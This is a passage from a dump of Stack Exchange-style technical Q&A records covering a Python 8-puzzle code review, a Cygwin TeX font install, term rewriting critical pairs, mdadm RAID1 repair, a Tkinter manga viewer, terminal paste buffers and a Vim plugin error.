1) print() print(optimal) print()################################################################# Main Programif __name__ == '__main__': main() | 8-Puzzle using A* and Manhattan Distance | python;python 3.x;ai;sliding tile puzzle;a star | Don't import things you don't use.You can safely remove dt and sys.Don't overwrite builtins. all is already a function, and your implementation is more is_anagram.When using Booleans use things for Booleans.# What are you on about 0 (the number) is never in.return 0 not in [c in s for c in set]# What you should usereturn False not in [c in s for c in set]# This can be better worded as:# And remove `__builtin__` if you stop shadowing `all`.return __builtin__.all(c in s for c in set)But then there is the usage of the bitwise not ~.>>> bool(~True), ~True(True, -2)>>> bool(~False), ~False(True, -1)>>> bool(~-1), ~-1(False, 0)Yes ~(np.all(list(state['board']) == succ, 1)).any() is always True. Instead use not.Use less comments. And if you are to use comments, use pre-line rather than inline.# uglygn = gn + 1 # increase cost g(n) by 1# better# increase cost g(n) by 1gn = gn + 1# Best (As we all understand addition.)gn += 1Use less intermarry variables. And remove un-used ones.# Badm = abs(s // 3 - g // 3) + abs(s % 3 - g % 3)return sum(m[1:])# Goodreturn sum((abs(s // 3 - g // 3) + abs(s % 3 - g % 3))[1:])# Badpos, fn = priority[0]# Goodpos, _ = priority[0]# Bestpos = priority[0][0]Use less whitespace. In the Python community whitespace is pretty important.The language it's self ingrains good practice of well tabbed code.But we also discourage useless whitespace, or whitespace that impairs readability.# Badmoves = np.array( [ ('u', [0, 1, 2], -3), ('d', [6, 7, 8], 3), ('l', [0, 3, 6], -1), ('r', [2, 5, 8], 1) ], dtype= [ ('move', str, 1), ('pos', list), ('delta', int) ] )# Goodmoves = np.array( [ ('u', [0, 1, 2], -3), ('d', [6, 7, 8], 3), ('l', [0, 3, 6], -1), ('r', [2, 5, 8], 1) ], dtype=[ ('move', str, 1), ('pos', list), ('delta', int) ])Pick better variable names. We're not all mathematicians, and even if we were gn is of no help to understand the program.parent on the other hand is a good variable name.The function all should be removed. As an alternate you can also just do an anagram check on it. sorted(a) == sorted(b)inversions can make use of sum to reduce noise.Reduce the amount of un-used items in your arrays, currently the boards parents and hn are never used.You can use a default dict rather than np.all(list(state['board']) == succ, 1).any()to check if you have already used found the board.This is good as for the input 012345678 you get:Total generated: 2057Total explored: 1305Total optimized steps: 22With defaultdict you can check the contense in O(1), where you would have to check in O(n) with np.all(...).So I would use:import numpy as npfrom copy import deepcopyfrom collections import defaultdictdef mhd(s, g): return sum((abs(s // 3 - g // 3) + abs(s % 3 - g % 3))[1:])def coor(s): c = np.array(range(9)) for x, y in enumerate(s): c[y] = x return cdef solve(board, goal): moves = np.array( [ ('u', [0, 1, 2], -3), ('d', [6, 7, 8], 3), ('l', [0, 3, 6], -1), ('r', [2, 5, 8], 1) ], dtype=[ ('move', str, 1), ('pos', list), ('delta', int) ] ) STATE = [ ('board', list), ('parent', int), ('gn', int), ('hn', int) ] PRIORITY = [ ('pos', int), ('fn', int) ] previous_boards = defaultdict(bool) goalc = coor(goal) hn = mhd(coor(board), goalc) state = np.array([(board, -1, 0, hn)], STATE) priority = np.array( [(0, hn)], PRIORITY) while True: priority = np.sort(priority, kind='mergesort', order=['fn', 'pos']) pos = priority[0][0] priority = np.delete(priority, 0, 0) board = state[pos][0] gn = state[pos][2] + 1 loc = int(np.where(board == 0)[0]) for m in moves: if loc not in m['pos']: succ = deepcopy(board) delta_loc = loc + m['delta'] succ[loc], succ[delta_loc] = succ[delta_loc], succ[loc] succ_t = tuple(succ) if previous_boards[succ_t]: continue previous_boards[succ_t] = True hn = mhd(coor(succ_t), goalc) state = np.append( state, np.array([(succ, pos, gn, hn)], STATE), 0 ) priority = np.append( priority, np.array([(len(state) - 1, gn + hn)], PRIORITY), 0 ) if np.array_equal(succ, goal): return state, len(priority)def inversions(s): k = s[s != 0] return sum( len(np.array(np.where(k[i+1:] < k[i])).reshape(-1)) for i in range(len(k) - 1) )def genoptimal(state): optimal = np.array([], int).reshape(-1, 9) last = len(state) - 1 while last != -1: optimal = np.insert(optimal, 0, state[last]['board'], 0) last = int(state[last]['parent']) return optimal.reshape(-1, 3, 3)def main(): print() goal = np.array([1, 2, 3, 4, 5, 6, 7, 8, 0]) string = input('Enter board: ') board = np.array(list(map(int, string))) if sorted(string) != sorted('012345678'): print('incorrect input') return if inversions(board) % 2: print('not solvable') return state, explored = solve(board, goal) optimal = genoptimal(state) print(( 'Goal achieved!\n' '\n' 'Total generated: {}\n' 'Total explored: {}\n' '\n' 'Total optimized steps: {}\n' '{}\n' '\n' ).format(len(state), len(state) - explored, len(optimal) - 1, optimal))if __name__ == '__main__': main() |
_unix.155992 | Windows 7TeX Live 2014I am trying to install Minion Pro and Myriad Pro for the use with pdflatex. When I try to run the script in cygwin vianame@pc-name /cygdrive/d/LaTeX/FontPro-master-Build01$ ./scripts/makeall MinionPro --expanded...this is what happens:Chosen font family is MinionProDifferent font versions found: --pack option is disabledCreating PostScript fonts ...C:\texlive\2014\bin\win32\cfftot1.exe: glyph sterling.oldstyle: Whilng otf/MinionPro-Bold.otf:C:\texlive\2014\bin\win32\cfftot1.exe: glyph sterling.oldstyle: warnex flex hint replaced with curvesC:\texlive\2014\bin\win32\cfftot1.exe: (This Type 2 format font containts prohibited by Type 1.C:\texlive\2014\bin\win32\cfftot1.exe: Ive safely replaced them with urves.)C:\texlive\2014\bin\win32\cfftot1.exe: glyph colonmonetary.oldstyle:cessing otf/MinionPro-It.otf:C:\texlive\2014\bin\win32\cfftot1.exe: glyph colonmonetary.oldstyle:complex flex hint replaced with curvesC:\texlive\2014\bin\win32\cfftot1.exe: (This Type 2 format font containts prohibited by Type 1.C:\texlive\2014\bin\win32\cfftot1.exe: Ive safely replaced them with urves.)Creating TeX metrics ..../scripts/makeall: Zeile 93: perl: Kommando nicht gefunden. < 62) : Syntaxfehler: Ungltiger arithmetischer Operator. (Fehlerveru < 62) \).t \scripts/maketfm: Zeile 245: bc: Kommando nicht gefunden.(I cut many lines similar to the last one with Kommando nicht gefunden. Had to hit Ctrl + C to stop it.)So apparently the file maketfm in the same isn't found due to the typical difference in the slashes. Does anyone have any idea how I can remedy this?New version, after installing perl for cygwin$ ./scripts/makeall MinionPro --expandedChosen font family is MinionProDifferent font versions found: --pack option is disabledCreating PostScript fonts ...C:\texlive\2014\bin\win32\cfftot1.exe: glyph sterling.oldstyle: While processing otf/MinionPro-Bold.otf:C:\texlive\2014\bin\win32\cfftot1.exe: glyph sterling.oldstyle: warning: complex flex hint replaced with curvesC:\texlive\2014\bin\win32\cfftot1.exe: (This Type 2 format font contains flex hints prohibited by Type 1.C:\texlive\2014\bin\win32\cfftot1.exe: Ive safely replaced them with ordinary curves.)C:\texlive\2014\bin\win32\cfftot1.exe: glyph colonmonetary.oldstyle: While processing otf/MinionPro-It.otf:C:\texlive\2014\bin\win32\cfftot1.exe: glyph colonmonetary.oldstyle: warning: complex flex hint replaced with curvesC:\texlive\2014\bin\win32\cfftot1.exe: (This Type 2 format font contains flex hints prohibited by Type 1.C:\texlive\2014\bin\win32\cfftot1.exe: Ive safely replaced them with ordinary curves.)Creating TeX metrics ... < 62) : Syntaxfehler: Ungltiger arithmetischer Operator. (Fehlerverursachendes < 62) \).t \ | File not found (cygwin on Windows) | shell script;cygwin | null |
_cs.47244 | I have tried to solve the following exercise but I got stuck while trying to find all the critical pairs.I have the following questions:How do I know which critical pair produced a new rule?How do I know I found all the critical pairs?Let $\Sigma= \left \{ \circ, i, e \right \}$ where $\circ$ is binary, $i$ is unary, and $e$ is a constant. $$E=\left \{ \begin{gather}( x \circ y ) \circ z \approx x \circ\left ( y \circ z \right ) \\x \circ e \approx x \\x \circ i(x) \approx e\end{gather} \right\}$$My work so far:$x\circ e >_{\textsf{lpo}} x$ (LPO 1) $x$ is a variable $x\circ i(x)>_{\textsf{lpo}} e$ (LPO 2b) there are no terms in the right hand side $(x\circ y)\circ z\approx x\circ(y\circ z)$ $s=\circ(\underset{\large s_1}{\circ(x,y)},\underset{\large s_2}{\strut z})\qquad t=\circ (\underset{\large t_1}{x\strut}, \underset{\large t_2}{\circ(y,z)})$ (LPO 2c)check that $s>t_j$, $j=\overline{1,m}$ $s>_{\textsf{lpo}}t_1$ (LPO 1) to prove that $s>_{\textsf{lpo}}t_2$ (LPO 2c) we prove that $$s>_{\textsf{lpo}} y \;\;\text{(LPO 1)};\qquad s>_{\textsf{lpo}}z \;\;\text{(LPO 1)};\qquad \circ(x,y)>y\;\;\text{(LPO 1)}$$find $i$ such that $s_i>_{\textsf{lpo}}t_i$ $i=1$ $$\circ(x,y)>_{\textsf{lpo}}x\;\;\text{(LPO 1)}$$$(x\circ y)\circ z>_{\textsf{lpo}} x\circ (y\circ z)$ a. $(x\circ y)\circ z\;\rightarrow\; x\circ (y\circ z)$ $x_1\circ e\;\rightarrow\; x_1$ $x\circ y \mathrel{\,=?\,} x_1\circ e$ $\theta\{x \;\leftarrow \;x_1;\; y\;\leftarrow \;e\}$ $$\require{AMScd}\require{cancel}\begin{CD}(x_1\circ e)\circ z @>>> \cancel{x_1}\circ z\\@VVV @VVV\\\cancel{x_1}\circ(e\circ z) @>>> e\circ z\approx z\end{CD}\qquad\text{left identity?}$$b. $(x\circ y)\circ z\;\rightarrow\; x\circ (y\circ z)$ $e\circ x_1\;\rightarrow\; x_1$ $x\circ y \mathrel{\,=?\,} e\circ x_1$ $\theta\{x \;\leftarrow \;e;\; y\;\leftarrow \;x_1\}$ $$\begin{CD}(e\circ x_1)\circ z @>>> x_1\circ z\\@VVV @VVV\\e\circ(x_1\circ z) @>>> ?\end{CD}$$c. $(x\circ y)\circ z\;\rightarrow\; x\circ (y\circ z)$ $x_1\circ i(x_1)\;\rightarrow\; e$ $x\circ y \mathrel{\,=?\,} x_1\circ i(x_1)$ $\theta\{x \;\leftarrow \;x_1;\; y\;\leftarrow \;i(x_1)\}$ $$\begin{CD}(x_1\circ i(x_1))\circ z @>>> e\circ z\\@VVV @VVV\\x_1\circ(i(x_1)\circ z) @>>> ?\end{CD}$$As a support document I have Term Rewriting and All That by Franz Baader and Tobias Nipkow.(original image here)EDIT1After searching for the critical pairs I have the following set of rules(assuming 2.a is corect):$$E=\left \{ \begin{gather}( x \circ y ) \circ z \approx x \circ\left ( y \circ z \right ) \\x \circ e \approx x \\x \circ i(x) \approx e \\x \circ (i(x) \circ y) \approx y \\x \circ ( y \circ i(x \circ y) ) \approx e \\e \circ x \approx x \\e \circ (x \circ y) \approx x \circ y\end{gather} \right\}$$ | Term rewriting; Compute critical pairs | logic;first order logic | Before adressing the actual questions, one remark on your work so far: the left cancellation in 2.a. is not correct in general, the critical pair would just be $x\circ(e\circ z) \approx x\circ z$. Consequently, you don't get the critical pair 2.b. The problem with this cancellation is that the equation you get does in general not follow from the axioms you started from; for example, if you are working in the language of rings, you might at some point derive the critical pair $0*x \approx 0*y$, but it would be incorrect to deduce $x\approx y$ (which would mean that you only have a trivial model). No sound rewriting procedure, including Huet's, should allow this reduction.On the other hand, you are missing the critical pairs you get by unifying (variable-renamed versions of) $x\circ e$ or $x\circ i(x)$ with all of $(x\circ y)\circ z$ (i.e. using the second $\circ$). The resulting critical pairs are$x\circ(y\circ e)\leftarrow (x\circ y)\circ e\to x\circ y$, which after reduction becomes the trivial equation $x\circ y\approx x\circ y$, and$x\circ(y\circ i(x\circ y))\leftarrow(x\circ y)\circ i(x\circ y)\to e$, which cannot be reduced further and gives the rule $x\circ(y\circ i(x\circ y))\to e$ (assuming that $\circ\triangleright e$ in the precedence $\triangleright$ used to define the LPO, just as you did when orienting $x\circ i(x)\approx e$).For the basic completion procedure: Whenever you create a critical pair, you reduce both sides as far as possible using the current set of rules. If the resulting normal forms are not equal, you create a new rule. For example, your 2.c. gives a new rule $x\circ(i(x)\circ z)\to e\circ z$. On the other hand, unifying $(x\circ y)\circ z$ with $x_1\circ y_1$ gives the critical pair $(x\circ y)\circ(z\circ z_1)\leftarrow((x\circ y)\circ z)\circ z_1\to(x\circ(y\circ z))\circ z_1$, which can be reduced to the trivial $x\circ(y\circ(z\circ z_1))\approx x\circ(y\circ(z\circ z_1))$ and discarded. Whenever you create a new rule $l\to r$, you must consider all critical pairs between it and the existing rules $l_1\to r_1,\dots,l_n\to r_n$, checking for unifiability of $l$ with each non-variable subterm of $l_i$ and vice versa. Also remember to check for self-overlaps, i.e. unifiability of $l$ with its own subterms, as we did above for associativity. You only stop when all critical pairs of the existing rules have been examined and either produced new rules, or been discarded.This procedure can be improved quite a bit. In particular, you can use new rules to simplify old ones (and possibly discarding them if they become trivial, meaning they are subsumed by the new rule), and a good heuristic for picking the next critical pair to examine can drastically cut down on the amount of rules. |
_unix.77307 | BEFORE: SERVER:~ # mdadm --detail /dev/md5/dev/md5: Version : 00.90.00 Creation Time : Fri Mar 18 14:53:33 2011 Raid Level : raid1 Array Size : 67103360 (63.99 GiB 68.71 GB) Device Size : 67103360 (63.99 GiB 68.71 GB) Raid Devices : 2 Total Devices : 1Preferred Minor : 5 Persistence : Superblock is persistent Update Time : Mon May 27 21:32:01 2013 State : clean, no-errors Active Devices : 1Working Devices : 1 Failed Devices : 0 Spare Devices : 0 Number Major Minor RaidDevice State 0 8 129 0 active sync /dev/sdi1 1 0 0 -1 removed UUID : 5cd4bFe4:dd1b759f:b7e070fe:c44bfRef Events : 0.36000940ADDING A DISK TO RAID1: SERVER:~ # mdadm --add /dev/md5 /dev/sdj1mdadm: hot added /dev/sdj1AFTER: SERVER:~ # mdadm --detail /dev/md5/dev/md5: Version : 00.90.00 Creation Time : Fri Mar 18 14:53:33 2011 Raid Level : raid1 Array Size : 67103360 (63.99 GiB 68.71 GB) Device Size : 67103360 (63.99 GiB 68.71 GB) Raid Devices : 2 Total Devices : 2Preferred Minor : 5 Persistence : Superblock is persistent Update Time : Mon May 27 21:32:32 2013 State : clean, no-errors Active Devices : 1Working Devices : 2 Failed Devices : 0 Spare Devices : 1 Number Major Minor RaidDevice State 0 8 129 0 active sync /dev/sdi1 1 0 0 -1 removed 2 8 145 -1 spare /dev/sdj1 UUID : 5cd4bFe4:dd1b759f:b7e070fe:c44bfRef Events : 0.36000955SERVER:~ # QUESTION: how can I remove this line/disk from md5? 1 0 0 -1 removedProbably this is the reason why /dev/sdj1 is marked as spare...I already tried to remove it: SERVER:~ # mdadm /dev/md5 -r detachedmdadm: cannot find detached: No such file or directorySERVER:~ # OS: SUSE LINUX Enterprise Server 9.4UPDATE: so can I remove a disk from an md* device using it's number? ( in this case the number would be 1 ) | How to remove disk from RAID1 without knowing the /dev/XXX name? | raid;sles | null |
_codereview.4377 | I'm currently making a manga (read: comic) viewer in python. This project has been a code as you learn project, because I have been trying to code this as I learned about Tkinter. Python I have known for some time, but not too long.Performance wise, I'm worried about the image loading and resizing time; it seems slow. I found out one thing by experimenting: when resizing P type images it is a lot slower than converting it to L (greyscale) and then resizing. Also the fullscreen is buggy, but this (and other minor bugs, coding format problems) is because I have thrown this together and haven't really re-coded it nicely yet (as I often do after I learn what I want it to be like, if you understand what I mean). Format wise, I don't think I have the best organization there is, maybe there is a better practice to hold up, or multiple files maybe (but python can't do this?)?Once again there are a lot of little bugs, like scrolling with the keyboard reveals extra space on the bottom, and the folder viewer doesn't always scroll to the selected folder in the dialog, and I would like to know how to fix this, but I would like more to know some good practices and optimization for image loading and resizing.from Tkinter import *from ttk import *import Image, ImageTk, tkFileDialog, osVERSION = v0.0.3folderDialog ClassDialog that asks the user to select a folder. Returns folder and gets destroyed.class folderDialog(Toplevel): def __init__(self, parent, callback, dir=./, fileFilter=None): Toplevel.__init__(self, parent) self.transient(parent) self.title(Browse Folders) self.parent = parent self.dir = StringVar() self.callback = callback self.fileFilter = fileFilter if os.path.exists(dir) and os.path.isdir(dir): self.dir.set(os.path.abspath(dir)) else: self.dir.set(os.path.abspath(./)) self.body = Frame(self) self.body.grid(row=0,column=0,padx=5,pady=5, sticky=(N,S,E,W)) Label(self.body, text=Please select a folder).grid(row=0,column=0, sticky=(N,S,W), pady=3) Label(self.body, text=You are in folder:).grid(row=1,column=0, sticky=(N,S,W)) Entry(self.body, textvariable=self.dir, state=readonly).grid(row=2,column=0,sticky=(N,S,E,W),columnspan=2) self.treeview = Treeview(self.body, columns=(dir, imgs), show=headings) self.treeview.grid(row=3,column=0,sticky=(N,S,E,W),rowspan=3,pady=5,padx=(0,5)) self.treeview.column(imgs, width=30, anchor=E) self.treeview.heading(dir, text=Select a Folder:, anchor=W) self.treeview.heading(imgs, text=Image Count, anchor=E) #self.treeview.heading(0, text=Select Directory) #self.listbox = Listbox(self.body, activestyle=dotbox, font=(Menu, 10)) #self.listbox.grid(row=3,column=0, sticky=(N,S,E,W),rowspan=3,pady=5,padx=(0,5)) ok = Button(self.body, text=Use Folder) ok.grid(row=3,column=1,sticky=(N,E,W), pady=5) cancel = Button(self.body, text=Cancel) cancel.grid(row=4,column=1,sticky=(N,E,W), pady=5) self.grab_set() self.protocol(WM_DELETE_WINDOW, self.cancel) self.bind(<Escape>, self.cancel) cancel.bind(<Button-1>, self.cancel) ok.bind(<Button-1>, self.selectFolder) self.treeview.bind(<Left>, self.newFolder) self.treeview.bind(<Right>, self.newFolder) self.treeview.bind(<Return>, self.selectFolder) self.treeview.bind(<Up>, self.onUpDown) self.treeview.bind(<Down>, self.onUpDown) self.treeview.bind(<<TreeviewSelect>>, self.onChange) self.geometry(%dx%d+%d+%d % (450, 400, parent.winfo_rootx()+int(parent.winfo_width()/2 - 200), parent.winfo_rooty()+int(parent.winfo_height()/2 - 150) )) self.updateListing() self.treeview.focus_set() self.resizable(0,0) self.columnconfigure(0, weight=1) self.rowconfigure(0, weight=1) self.body.columnconfigure(0, weight=1) self.body.rowconfigure(5, weight=1) self.wait_window(self) def newFolder(self, event): newDir = self.dir.get() if event.keysym == Left: #newDir = os.path.join(newDir, ..) self.upFolder() return else: selected = self.getSelected() if selected == .: #special super cool stuff here self.selectFolder() return elif selected == ..: self.upFolder() return else: newDir = os.path.join(newDir, selected) self.dir.set(os.path.abspath(newDir)) self.updateListing() def upFolder(self): cur = os.path.split(self.dir.get()) newDir = cur[0] cur = cur[1] self.dir.set(os.path.abspath(newDir)) self.updateListing() children = self.treeview.get_children() for child in children: if self.treeview.item(child, text) == cur: self.treeview.selection_set(child) self.treeview.focus(child) #print please see self.treeview.see(child) return def onChange(self, event=None): #print event sel = self.treeview.focus() if sel == '': return #not possible, but just in case if self.treeview.item(sel, values)[1] == ?: #print Has ? self.imgCount() def imgCount(self): folder = os.path.join(self.dir.get(), self.getSelected()) folder = os.path.abspath(folder) count = 0 dirList = os.listdir(folder) for fname in dirList: if self.fileFilter == None: count = count + 1 else: ext = os.path.splitext(fname)[1].lower()[1:] #print ext for fil in self.fileFilter: #print fil if ext == fil: count = count + 1 break #print count sel = self.treeview.focus() newV = (self.treeview.item(sel, values)[0], str(count)) self.treeview.item(sel, value=newV) def onUpDown(self, event): sel = self.treeview.selection() if len(sel) == 0: return active = self.treeview.index(sel[0]) children = self.treeview.get_children() length = len(children) toSelect = 0 if event.keysym == Up and active == 0: toSelect = length - 1 elif event.keysym == Down and active == length-1: toSelect = 0 else: return toSelect = children[toSelect] self.treeview.selection_set(toSelect) self.treeview.focus(toSelect) self.treeview.see(toSelect) return 'break' def updateListing(self, event=None): folder = self.dir.get() children = self.treeview.get_children() for child in children: self.treeview.delete(child) #self.treeview.set_children(, '') dirList = os.listdir(folder) first = self.treeview.insert(, END, text=., values=((.) - Current Folder, ?)) self.treeview.selection_set(first) self.treeview.focus(first) self.treeview.insert(, END, text=.., values=((..), ?)) #self.listbox.insert(END, (.) - Current Folder) #self.listbox.insert(END, (..)) for fname in dirList: if os.path.isdir(os.path.join(folder, fname)): #self.listbox.insert(END,fname+/) self.treeview.insert(, END, values=(fname+/, ?), text=fname) def selectFolder(self, event=None): selected = os.path.join(self.dir.get(), self.getSelected()) selected = os.path.abspath(selected) self.callback(selected, self) self.cancel() def getSelected(self): selected = self.treeview.selection() if len(selected) == 0: selected = self.treeview.identify_row(0) else: selected = selected[0] return self.treeview.item(selected, text) def ok(self): #print value is, self.e.get() self.top.destroy() def cancel(self, event=None): self.parent.focus_set() self.destroy()Img ClassStores path to img and manipulates (resizes).class Img: def __init__(self, path): self.path = path self.size = 0,0 self.oSize = 0,0 self.img = None self.tkpi = None split = os.path.split(self.path) self.folderName = os.path.split(split[0])[1] self.fileName = split[1] self.stats() #print Loaded + path self.img = None def stats(self): self.img = Image.open(self.path) self.size = self.img.size self.oSize = self.img.size def load(self): self.img = Image.open(self.path)#.convert(RGB) #RGB for better resizing #print self.img.mode if self.img.mode == P: self.img = self.img.convert(L) #L scales much more nicely than P def unload(self): self.img = None self.tkpi = None self.size = self.oSize def fit(self, size): #ratio = min(1.0 * size[0] / self.oSize[0], 1.0 * size[1] / self.oSize[1]) ratio = 1.0 * size[0] / self.oSize[0] ratio = min(ratio, 1.0) #print ratio self.size = (int(self.oSize[0] * ratio), int(self.oSize[1] * ratio)) #print self.size def resize(self, size): #self.fit(size) self.load() self.img = self.img.resize(self.size, Image.BICUBIC) #self.img = self.img.resize(self.size, Image.ANTIALIAS) self.tkpi = ImageTk.PhotoImage(self.img) return self.tkpi def quickResize(self, size): self.fit(size) if self.img == None: self.load() self.img = self.img.resize(self.size) self.tkpi = ImageTk.PhotoImage(self.img) return self.tkpiMangaViewer ClassThe main class, runs everything.class MangaViewer: def __init__(self, root): self.root = root self.setTitle(VERSION) root.state(zoomed) self.frame = Frame(self.root)#, bg=#333333)#, cursor=none) self.canvas = Canvas(self.frame,xscrollincrement=15,yscrollincrement=15,bg=#1f1f1f, highlightthickness=0) scrolly = Scrollbar(self.frame, orient=VERTICAL, command=self.canvas.yview) self.canvas.configure(yscrollcommand=scrolly.set) #self.img = Image.open(C:\\Users\\Alex\\Media\\manga\\Boku wa Tomodachi ga Sukunai\\16\\02-03.png) #self.tkpi = ImageTk.PhotoImage(self.img) #self.imgId = self.canvas.create_image(0,0, image=self.tkpi, anchor=nw) #self.canvas.configure(scrollregion=self.canvas.bbox(ALL)) self.files = [] self.current = 0 self.canvas.bind(<Configure>, self.onConfig) self.root.bind(<Up>, self.onScroll) self.root.bind(<Down>, self.onScroll) self.root.bind(<Left>, self.onNewImg) self.root.bind(<Right>, self.onNewImg) self.root.bind(<d>, self.getNewDirectory) self.root.bind(<f>, self.toggleFull) self.root.bind(<Motion>, self.onMouseMove) #Windows self.root.bind(<MouseWheel>, self.onMouseScroll) # Linux self.root.bind(<Button-4>, self.onMouseScroll) self.root.bind(<Button-5>, self.onMouseScroll) self.root.bind(<Escape>, lambda e: self.root.quit()) self.frame.grid(column=0, row=0, sticky=(N,S,E,W)) self.canvas.grid(column=0,row=0, sticky=(N,S,E,W)) #scrolly.grid(column=1, row=0, sticky=(N,S)) self.root.columnconfigure(0, weight=1) self.root.rowconfigure(0, weight=1) self.frame.columnconfigure(0, weight=1) self.frame.rowconfigure(0, weight=1) self.resizeTimeO = None self.mouseTimeO = self.root.after(1000, lambda x: x.frame.configure(cursor=none), self) self.lastDir = os.path.abspath(./) self.imgId = None self.fullscreen = False def toggleFull(self, event=None): if self.fullscreen: root.overrideredirect(False) else: root.overrideredirect(True) self.fullscreen = not self.fullscreen self.onConfig(None) def setTitle(self, *titles): st = for title in titles: st = st + + str(title) self.root.title(MangaViewer - + st) def setTitleToImg(self): self.setTitle(self.files[self.current].folderName,-, self.files[self.current].fileName,(,(self.current+1),/,len(self.files),)) def onMouseMove(self, event): hide cursor after some time #print event self.frame.configure(cursor=) if self.mouseTimeO != None: self.root.after_cancel(self.mouseTimeO) self.mouseTimeO = self.root.after(1000, lambda x: x.frame.configure(cursor=none), self) def onMouseScroll(self, event): #mousewheel for windows, mousewheel linux, or down key if event.num == 4 or event.delta == 120: self.canvas.yview(scroll, -3, units) else: self.canvas.yview(scroll, 3, units) def onScroll(self, event): called when the up or down arrow key is pressed if event.keysym == Down: self.canvas.yview(scroll, 1, units) else: self.canvas.yview(scroll, -1, units) def onNewImg(self, event): called when the left or right arrow key is pressed, changes the image change = 1 #right key if event.keysym == Left: change = -1 newImg = self.current + change if newImg < 0 or newImg >= len(self.files): self.getNewDirectory() return #self.img = self.files[newImg]; #self.tkpi = ImageTk.PhotoImage(self.img) #self.canvas.delete(self.imgId) #self.imgId = self.canvas.create_image(0,0, image=self.tkpi, anchor=nw) #self.canvas.configure(scrollregion=self.canvas.bbox(ALL)) #needed? self.files[self.current].unload() self.current = newImg self.setTitleToImg() self.onConfig(None, True) def getNewDirectory(self, event=None): folderDialog(self.root, self.selNewDirectory, self.lastDir, fileFilter=[jpg, png, gif, jpeg]) def selNewDirectory(self, dirname, fd): callback given to folderDialog fd.cancel() #destroy the folderDialog if self.lastDir == dirname: return self.lastDir = dirname #print dirname dirList = os.listdir(dirname) self.files = [] self.current = -2 for fname in dirList: ext = os.path.splitext(fname)[1].lower() if ext == .png or ext == .jpg or ext == .jpeg or ext == .gif: self.files.append(Img(os.path.join(dirname, fname))) self.current = 0 if len(self.files) == 0: return self.setTitleToImg() self.onConfig(None, True) def resize(self, finalResize=False): resizes the image canvasSize = (self.canvas.winfo_width(), self.canvas.winfo_height()) tkpi = None if finalResize: tkpi = self.files[self.current].resize(canvasSize) else: tkpi = self.files[self.current].quickResize(canvasSize) if self.resizeTimeO != None: #is this the best way to do this? self.root.after_cancel(self.resizeTimeO) self.root.after(200, self.onConfig, None, True) if self.imgId != None: self.canvas.delete(self.imgId) self.imgId = self.canvas.create_image(0,0, image=tkpi, anchor=nw) #self.canvas.configure(scrollregion=self.canvas.bbox(ALL)) bbox = self.canvas.bbox(ALL) #nBbox = (bbox[0], bbox[1]-60, bbox[2], bbox[3]+60) nBbox = bbox self.canvas.configure(scrollregion=nBbox) #print self.canvas.bbox(ALL) def onConfig(self, event, finalResize=False): runs the resize method and centers the image if self.current < 0 or self.current >= len(self.files): return self.canvas.yview(moveto, 0.0) self.resize(finalResize) newX = (self.canvas.winfo_width() - self.files[self.current].size[0])/2 #newY - 60 TODO change to preference padding newY = (self.canvas.winfo_height() - self.files[self.current].size[1])/2# - 60 newY = max(newY, 0) self.canvas.coords(self.imgId, newX, newY) self.canvas.yview(moveto, 0.0) bbox = self.canvas.bbox(ALL) nbbox = (0,0, bbox[2], max(bbox[3], self.canvas.winfo_height())) self.canvas.configure(scrollregion=nbbox)root = Tk()MangaViewer(root)root.mainloop() | Optimizing Python Image Viewer and General Code Format Advise | python;optimization;algorithm | null |
_unix.230889 | I am trying to cut-paste some switch config over an ssh session from my mac. It seems to start mangling it after a set buffer size. Surely cut-paste buffer is large enough, since I can cut-paste just fine in other programs(even chrome terminal emulator for the same ssh session funny enough). Is there a way to increase this cut-paste buffer to a terminal on MacOS, or am I stuck cut-pasting in short bursts?EDIT:So, after quite a bit of debugging of the kernel tty driver on the OS where I was connecting to, I found that the root cause of it was the specific tty implementation, which had only a small buffer (1k). As a result pasting anything larger would overrun that buffer and create the above mentioned problem. With chrome terminal emulator, it looks like it has its own buffer and just waits for a prompt and sends it line-by-line to the pty. | MacOS terminal ssh input buffer size | osx;ssh;tty | null |
_cstheory.2674 | What's your favorite examples where information theory is used to prove a neat combinatorial statement in a simple way ?Some examples I can think of are related to lower bounds for locally decodable codes, e.g., in this paper: suppose that for a bunch of binary strings $x_1,...,x_m$ of length $n$ it holds that for every $i$, for $k_i$ different pairs {$j_1,j_2$}, $$e_i = x_{j_1} \oplus x_{j_2}.$$ Then m is at least exponential in n, where the exponent depends linearly on the average ratio of $k_i/m$. Another (related) example is some isoperimetric inequalities on the Boolean cube (feel free to elaborate on this in your answers).Do you have more nice examples? Preferably, short and easy to explain. | Information Theory used to prove neat combinatorial statements? | co.combinatorics;big list;it.information theory | null |
_unix.234854 | Basically when I try to run vi, I have the following error (and after open it, there are a lot of errors):Error detected while processing function UltiSnips#bootstrap#Bootstrap:line 35:Traceback (most recent call last): File <string>, line 1, in <module> File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/__init__.py, line 8, in <module> from UltiSnips.snippet_manager import SnippetManager File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/snippet_manager.py, line 16, in <module> from UltiSnips.snippet.definition import UltiSnipsSnippetDefinition File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/snippet/definition/__init__.py, line 3, in <module> from UltiSnips.snippet.definition.ultisnips import UltiSnipsSnippetDefinition File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/snippet/definition/ultisnips.py, line 6, in <module> from UltiSnips.snippet.definition._base import SnippetDefinition File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/snippet/definition/_base.py, line 12, in <module> from UltiSnips.text_objects import SnippetInstance File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/text_objects/__init__.py, line 9, in <module> from UltiSnips.text_objects._shell_code import ShellCode File /Users/myname/.vim/bundle/ultisnips/pythonx/UltiSnips/text_objects/_shell_code.py, line 10, in <module> import tempfile File /usr/local/Cellar/python/2.7.10_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/tempfile.py, line 32, in <module> import io as _io File /usr/local/Cellar/python/2.7.10_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/io.py, line 51, in <module> import _ioImportError: dlopen(/usr/local/Cellar/python/2.7.10_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_io.so, 2): Symbol not found: __PyErr_ReplaceException Referenced from: /usr/local/Cellar/python/2.7.10_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_io.so Expected in: flat namespace in /usr/local/Cellar/python/2.7.10_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_io.soBasically, I want to reinstall vi.However, after following the 